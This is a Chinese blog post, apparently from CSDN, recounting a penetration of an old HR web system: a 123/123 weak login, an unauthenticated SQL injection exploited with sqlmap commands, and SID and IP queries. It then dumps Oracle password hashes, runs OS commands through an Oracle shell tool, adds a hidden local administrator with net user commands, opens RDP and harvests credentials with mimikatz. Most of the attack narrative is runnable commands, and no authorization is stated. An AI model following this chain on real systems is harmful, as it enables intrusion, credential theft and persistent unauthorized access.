一次从弱口令到getshell

最新推荐文章于 2024-11-11 08:44:04 发布
最新推荐文章于 2024-11-11 08:44:04 发布
阅读量165 收藏
点赞数
分类专栏: web渗透经典案例 文章标签: 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64910183/article/details/126612727
版权

0x01 弱口令

在一次针对某站点信息收集的过程中,通过子域名扫描,扫描到某个老旧系统。

1629098949_611a13c5e2023f68aa123.png!small?1629098952907

一看这都2014年的老站了,肯定有搞头!

日常使用burp爆破一波试试,没爆破出来

但是随手一试,好家伙123/123进入系统,属于是运气拉满了

(高强度打码)

1629099157_611a149547fda2b8e9964.png!small?1629099159494

这里能看到是一个“编辑”人员的权限,并没有什么上传等后台管理的功能,只能耐心过一遍系统的各种功能。

0x02 SQL注入

进入系统翻一翻,没有什么敏感信息泄露,但是在一处查询人员信息的接口发现了SQL注入(xray被动扫描扫出来的)

http://host.com/xxx/control/SearchMenHunInfo?content=123

这时想要手工验证一下,发现甚至不需要后台cookie就能直接访问该接口,相当于还存在未授权访问漏洞。

那这sqlmap一把梭,--cookie参数都不用加了

python sqlmap.py -u "http://host.com/xxx/control/SearchMenHunInfo?content=123" --current-db

1629100685_611a1a8d4ca7c7edef78d.png!small?1629100687369

这里跑出了库名,还能看到这是一个Oracle数据库。打算继续拿shell试试。

但是在我日常渗透过程中,Oracle数据库并不常见,sqlmap中--os-shell参数还是不支持Oracle数据库的,只能现学现卖一波。

0x03 getshell

首先参考了这篇文章  Oracle注入 - 命令执行&Shell反弹

1629101572_611a1e0406da1334227dd.png!small?1629101573386

文章中介绍到以下版本的Oracle在发现注入后可以命令执行

那么再用sqlmap查看一下Oracle版本

python sqlmap.py -u "http://host.com/xxx/control/SearchMenHunInfo?content=123" -b

1629101914_611a1f5a2cdcceb802e83.png!small?1629101915711

看来是符合可以命令执行的版本的!

又经历了一波漫长的学习,发现了github一个大佬已经集成好的工具 oracleShell oracle 数据库命令执行

工具截图如下

1629102386_611a2132b089bb783a905.png!small?1629102388399

可以看出,我们还需要知道数据库的SID,用户名,密码,就可以尝试执行命令。

那么就继续利用sqlmap来扩大我们已知信息。

查看数据库权限--is-dba

1629102568_611a21e8e65e1527c6a5a.png!small?1629102570531

查看数据库IP,SID

这里进入sqlmap的--sql-shell模式,用sql语句来查询

查询SID:select instance_name from v$instance

查询当前IP:select sys_context('userenv','ip_address') from dual

1629102806_611a22d69a7674a91543f.png!small?1629102808241

爆破所有数据库账号、密码

使用sqlmap的--passwords参数,跑出数据库的所用用户名和对应的密码

经过漫长的等待,终于有了结果(这里给出的是虚构的数据)

database management system users password hashes:
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] HR [1]:
    password hash: 6399F3B38EDF3288
[*] SYS [1]:
    password hash: 4DE42795E66117AE
[*] SYSMAN [1]:
    password hash: B607EEBB3A2D36D0
[*] SYSTEM[1]:
    password hash: 8877FF8306EF558B
    clear-text password: SYS

可以看到有些用户名只得到了对应的哈希,但是其中一个用户名system成功跑出了明文密码!

查询Oracle常用端口

Oracle确实不熟悉,百度查一波端口:

查询发现,服务端默认的端口号一般是389,客户端默认的端口号一般都是1521

OK!现在已经拥有了IP,PORT,SID,用户名(SYSTEM),密码(SYS),可以直接使用工具连接了。

1629103630_611a260eddcad3e1ff238.png!small?1629103632329

一切顺利!取得了system权限!

0x04 进一步证明危害

创建个用户试试

net user name pwd /add

net localgroup Administrators name /add

远程桌面RDP连接 name/pwd

1629104189_611a283d93beace7f71e7.png!small?1629104197524

连接成功!

上传一个mimikatz,抓取管理员明文密码

privilege::debug

sekurlsa::logonPasswords

1629104190_611a283e48986590be6e9.png!small?1629104197526

最终成功登录Administrator账号RDP

1629104196_611a284403ee7334b6697.png!small?1629104197528

至此,渗透结束。

0x05 总结

弱口令->sql注入->getshell->拿下管理员权限

1.通过子域名扫描工具对目标域名进行扫描,发现存在一个人力资源管理系统

2.通过手动测试123/123弱口令进入系统

3.在后台的查询人员处存在SQL注入漏洞(xray被动扫描扫出来的)

4.通过sqlmap跑出当前数据库为oracle

python sqlmap.py -u "http://host.com/xxx/control/SearchMenHunInfo?content=123" --current-db

5.sqlmap中--os-shell参数是不支持Oracle数据库的,因此这里只能通过--os-sql来查找敏感信息

6.查询oracle版本,发现版本为10.2.1.0(oracle能执行命令的版本为8.1.7.4,9.2.01-9.2.0.7,10.1.0.2-10.1.0.4,10.2.0.1-10.2.0.2)

python sqlmap.py -u "http://host.com/xxx/control/SearchMenHunInfo?content=123" -b

7.查询数据库权限,是DBA权限

python sqlmap.py -u "http://host.com/xxx/control/SearchMenHunInfo?content=123" --is-dba

8.通过--os-sql来查找查看数据库IP,SID

select instance_name from v$instance   //查询SID

select sys_context('userenv','ip_address') from dual   //查询当前IP

9.通过sqlmap进行password dump出,用户名system成功跑出了明文密码

python sqlmap.py -u "http://host.com/xxx/control/SearchMenHunInfo?content=123"  --passwords

10.同时通过nmap扫描出数据库服务器IP开放了1521端口。

11.通过oracleshell工具远程连接数据库,并执行系统命令

12.在命令中添加用户名和密码并添加到管理员组,通过注册表开启远程桌面。

net user name pwd /add

net localgroup Administrators name /add

13.通过mimikatz读取到系统的密码

privilege::debug

sekurlsa::logonPasswords

渗透测试中心
关注
专栏目录
超级弱口令检查工具(附带弱口令字典)
07-22
超级弱口令检查工具(附带弱口令字典)
Sqlmap的getshell使用(--os-shell
bring_coco的博客
03-16 1万+
环境:sqli-lab靶场+phpstudy。
sql注入getshell的几种方式
热门推荐
内心不种满鲜花就会长满杂草
04-29 3万+
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
ctfshow web2|手工注入|sqlmap|getshell练习
spring!
03-26 2068
爆表名 `username=2&password=3' or 1=1 union select 1,(select group_concat( table_name) from information_schema.``TABLES`` where table_schema=database() limit 0,1),3 #` ![image-20220325104245704](https://cdn.jsdelivr.net/gh/r2233r/psBed@main/img/20220326162
sqlmap绕过d盾_记一次sqlmap --os-shell getshell过程的坑
weixin_39900830的博客
12-05 1016
目标站点输入帅比' or 'a'='a 并随意输入一个密码,提示密码错误,就不多bb了直接sqlmap一把梭。来坑了来坑了,这个位置的注入死活没跑出来,可能的原因:1.我太菜 √2.站点为https然而我没有在数据包里面添加:443 × 登录系统后发现整个系统都是注入,随便找了个其他地方开始了注入……在host后面添加:443 host后面没加:443之前就一直没跑出来,并且sq...
MSSQL sa 弱口令提权基础知识学习
wjy397的专栏
06-29 3042
https://bbs.ichunqiu.com/thread-23312-1-1.html 1. “扩展存储过程”中的 xp_cmdshell Microsoft SQLServer是一个C/S模式的强大的关系型数据库管理系统,应用领域十分广泛,从网站后台数据库到一些MIS(管理信息系统)到处都可以看到它的身影。 网络安全中经常利用SqlServer SA弱
java弱口令验证的代码
07-19
包含连续或多个重复字符(如abc,123,111,bbb)、键盘连续字符(如qwe,!@#,qaz)、关键字的验证(如admin,root,user),不用引jar文件,导入项目直接可用
原创一次性口令(OneTimePassword)C语言源码
11-09
技术是一种接近自然随机数算法:均态分布随机数算法(非正态分布/高斯分布随机数算法)。 可能是超简单、超快速、超高效的口令生成器。 欢迎各路加解密精英高手破解,如果您破解了,拜请通知我。
2020最全弱口令常用口令大集合
09-26
2020最新的弱口令大集合,从top100,1000到top100000的密码,以及常见的从3位起到10位的弱口令,还有姓名拼音等多个弱口令字典,各种撞库等,数字亲测好用,大家快来下载吧,挺不错的一个资源哦!!
常见弱口令字典.rar
01-27
通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令弱口令指的是仅包含简单数字和字母的口令
07 Oracle数据库恢复基础解析:从检查点到归档,一步步构建数据安全防线
超哥的博客
11-09 1029
检查点是Oracle数据库中的一个特殊事件,它的作用是将内存中的数据块同步到磁盘上,以确保数据的持久性。简单来说,就是让数据库“记住”到目前为止所有的更改。Redo日志是Oracle用来记录所有数据更改的日志文件。每次对数据库进行修改时,都会先写入Redo日志,然后再写入数据文件。这样,即使系统崩溃,也能通过Redo日志恢复数据。当数据库运行在归档模式下时,一旦当前的Redo日志文件满,Oracle会将其复制到一个安全的存储位置,并标记为已归档。这样可以长期保留Redo日志,便于历史数据的恢复。
2024.11.6-Redis的事务与持久化
whisper_Java 的博客
11-06 831
MULTI、EXEC、DISCARD和WATCH 是 Redis 事务相关的命令。Redis的事务是将一系列待执行的指令存到一个Queue中,并使用exec执行事务。​--1. Redis事务是一个独立的隔离机制:事务中的所有命令都会序列化到queue、并按顺序地执行queue里的指令。事务在执行的过程中,不会被其他客户端发送来的命令请求所打断。​​multi: 用于开启事务,将待执行的命令放入到队列中exec命令:负责触发并执行事务中的所有命令:discard: 用于取消组队。
随堂测微信小程序ssm+论文源码调试讲解
u014445459的博客
11-11 630
微信小程序,简称小程序,英文名Mini Program,是一种全新的连接用户与服务的方式,可以快速访问、快速传播,并具有良好的使用体验。小程序的主要开发语言是JavaScript,它与普通web的开发有很多相似之处。小程序和普通网页开发并不是相同的东西,是有差异的。网页开发的渲染线程和脚本线程是互斥的,而在小程序中,确实分开的,分别在不同的线程之中运行。
Redis - 事务
ketil27的博客
11-08 866
Redis 的事务和MySQL的事务概念上是类似的.都是把⼀系列操作绑定成⼀组.让这⼀组能够批量执 ⾏.弱化的原⼦性:redis没有"回滚机制".只能做到这些操作"批量执⾏".不能做到"⼀个失败就恢复到 初始状态".不保证⼀致性:不涉及"约束". 也没有回滚.MySQL的⼀致性体现的是运⾏事务前和运⾏后,结果都 是合理有效的,不会出现中间⾮法状态.不需要隔离性:也没有隔离级别,因为不会并发执⾏事务(redis单线程处理请求).
【达梦数据库Oracle数据库通过DTS工具迁移数据到达梦数据库--索引数量存在出入
weixin_47686079的博客
11-06 158
【代码】【达梦数据库Oracle数据库通过DTS迁移到达梦数据库索引数量不一致。
SpringBoot助力的共享汽车业务优化系统
2402_85762143的博客
11-09 1067
在整个系统测试中,根据需求文档和设计文档,逐一对功能进行检测并写好测试用例,有效避免残片缺陷,因为产品出现缺陷不仅影响功能,而且可以导致数据的不准确,导致产品质量的降低,经过测试,才能使得产品的稳定性和成熟度得到极大的提升,产品质量也才有保证。近来,软件工程界趋向于一种新的观点,即认为软件生命周期每一阶段中都应包含测试,从而检验本阶段的成果是否接近预期的目标,尽可能早的发现错误并加以修正,如果不在早期阶段进行测试,错误的延时扩散常常会导致最后成品测试的巨大困难。任务:消除软件故障,保证程序的可靠运行。
Java基于小程序公考学习平台的设计与实现(附源码,文档)
chusheng1840的博客
11-09 1089
Java基于小程序公考学习平台的设计与实现,小程序公考学习平台使用Java语言进行编码,使用Mysql创建数据表保存本系统产生的数据。系统可以提供信息显示和相应服务,其管理小程序公考学习平台信息,查看小程序公考学习平台信息,管理小程序公考学习平台。总之,小程序公考学习平台集中管理信息,有着保密性强,效率高,存储空间大,成本低等诸多优点。它可以降低信息管理成本,实现信息管理计算机化。关键词:小程序公考学习平台;Java语言;Mysql。
基于 SpringBoot 实现QQ邮箱验证码注册功能
2301_79201049的博客
11-06 669
找到并开通以下的邮件协议服务,而且服务开启也较为简单,需要我们发送一个短信到指定的号码,开启后平台会提供一个授权码,一定要记住这个授权码,发邮件的时候需要这个。host 是根据服务主机区分,网易邮箱是 smtp.163.com, qq邮箱是 smtp.qq.com。其中的 username 是你第一步中操作的邮箱账号,nickname 是接收者收到邮件中显示的发件人。发送邮件的核心依赖是 mail ,由于该项目还涉及其他依赖就全都导进来了。(1)首先打开QQ邮箱,点击设置并来到账号页面。
SMB共享文件夹-Spring项目数据与服务分离基础配置
最新发布
一只菜鸟夹
11-11 291
某项目需要将数据与服务分离部署在两个服务器,涉及到文件加密访问以及Mysql、ElasticSearch、Redis等数据的互通。下面是自己部署的步骤。
C#实现Winform基于SQL的动态一次性口令系统
资源摘要信息:"本资源是关于使用WinForms技术结合C#语言开发的一个具有一次性口令加密特性的客户端/服务器(C/S)架构安全通信系统。该系统由客户端和服务器端两部分组成,客户端主要负责用户登录流程,并与服务器端...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试中心

各位师傅,觉得文章不错可支持下

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值